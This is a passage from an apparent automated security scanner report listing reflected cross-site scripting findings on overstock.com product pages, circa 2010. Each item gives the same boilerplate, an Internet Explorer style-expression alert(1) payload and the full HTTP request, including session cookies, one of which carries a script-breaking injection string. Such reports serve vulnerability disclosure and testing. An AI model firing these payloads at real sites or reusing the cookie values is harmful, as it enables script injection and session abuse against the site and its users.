GET /Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html?66523"style%3d"x%3aexpression(alert(1))"edf649f61ee=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.168. http://www.overstock.com/Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84ed"style="x:expression(alert(1))"6d161d83ee7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html?a84ed"style%3d"x%3aexpression(alert(1))"6d161d83ee7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.169. http://www.overstock.com/Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8128"style%3d"x%3aexpression(alert(1))"78e6724e003 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8128"style="x:expression(alert(1))"78e6724e003 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Chrome-Widespread-Bathroom-Faucet/1893704/product.html?c8128"style%3d"x%3aexpression(alert(1))"78e6724e003=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.170. http://www.overstock.com/Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 368b2"style="x:expression(alert(1))"ea0d990e260 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html?368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.171. http://www.overstock.com/Home-Garden/Classique-Double-Floor-Cabinet/3164643/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc00d"style%3d"x%3aexpression(alert(1))"93a9777468f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc00d"style="x:expression(alert(1))"93a9777468f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Classique-Double-Floor-Cabinet/3164643/product.html?bc00d"style%3d"x%3aexpression(alert(1))"93a9777468f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.172. http://www.overstock.com/Home-Garden/Classique-Espresso-Corner-Floor-Cabinet/4566505/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511c6"style%3d"x%3aexpression(alert(1))"87d0097ed75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511c6"style="x:expression(alert(1))"87d0097ed75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Classique-Espresso-Corner-Floor-Cabinet/4566505/product.html?511c6"style%3d"x%3aexpression(alert(1))"87d0097ed75=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.173. http://www.overstock.com/Home-Garden/Classique-Espresso-Double-door-Floor-Cabinet/4566363/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a691"style%3d"x%3aexpression(alert(1))"8b8aad00077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a691"style="x:expression(alert(1))"8b8aad00077 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Classique-Espresso-Double-door-Floor-Cabinet/4566363/product.html?2a691"style%3d"x%3aexpression(alert(1))"8b8aad00077=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.174. http://www.overstock.com/Home-Garden/Classique-Wall-Cabinet-with-Two-Doors/3164633/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bd6"style%3d"x%3aexpression(alert(1))"35c2c7e73e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2bd6"style="x:expression(alert(1))"35c2c7e73e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Classique-Wall-Cabinet-with-Two-Doors/3164633/product.html?d2bd6"style%3d"x%3aexpression(alert(1))"35c2c7e73e3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.175. http://www.overstock.com/Home-Garden/Comfort-Dreams-11-inch-Select-A-Firmness-Memory-Foam-Queen-size-Mattress/3158654/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16ff"style%3d"x%3aexpression(alert(1))"6a1b9064799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c16ff"style="x:expression(alert(1))"6a1b9064799 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Comfort-Dreams-11-inch-Select-A-Firmness-Memory-Foam-Queen-size-Mattress/3158654/product.html?c16ff"style%3d"x%3aexpression(alert(1))"6a1b9064799=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.176. http://www.overstock.com/Home-Garden/Compact-Computer-Cabinet/3421185/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0ee"style%3d"x%3aexpression(alert(1))"333b778da19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad0ee"style="x:expression(alert(1))"333b778da19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Compact-Computer-Cabinet/3421185/product.html?ad0ee"style%3d"x%3aexpression(alert(1))"333b778da19=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.177. http://www.overstock.com/Home-Garden/Cooper-Paisley-3-piece-Quilt-Set/2597178/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9c93"style%3d"x%3aexpression(alert(1))"0f93966c318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9c93"style="x:expression(alert(1))"0f93966c318 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cooper-Paisley-3-piece-Quilt-Set/2597178/product.html?e9c93"style%3d"x%3aexpression(alert(1))"0f93966c318=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.178. http://www.overstock.com/Home-Garden/Copenhagen-Dark-Brown-Faux-Leather-Tufted-Queen-Bed/5184331/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd8c"style%3d"x%3aexpression(alert(1))"96e72c71e43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bd8c"style="x:expression(alert(1))"96e72c71e43 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Copenhagen-Dark-Brown-Faux-Leather-Tufted-Queen-Bed/5184331/product.html?5bd8c"style%3d"x%3aexpression(alert(1))"96e72c71e43=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438a7"style%3d"x%3aexpression(alert(1))"b74fa8588c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 438a7"style="x:expression(alert(1))"b74fa8588c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cosmo-Fabric-Barstool/4118979/product.html?438a7"style%3d"x%3aexpression(alert(1))"b74fa8588c1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.180. http://www.overstock.com/Home-Garden/Cotton-300-Thread-Count-Duvet-Cover-Set/4321580/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff949"style%3d"x%3aexpression(alert(1))"da8b89d6cd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff949"style="x:expression(alert(1))"da8b89d6cd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Cotton-300-Thread-Count-Duvet-Cover-Set/4321580/product.html?ff949"style%3d"x%3aexpression(alert(1))"da8b89d6cd3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.181. http://www.overstock.com/Home-Garden/Cotton-All-Seasons-250-Thread-Count-White-Down-Comforter/4104109/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 793c6"style%3d"x%3aexpression(alert(1))"6fda90dd35b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 793c6"style="x:expression(alert(1))"6fda90dd35b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
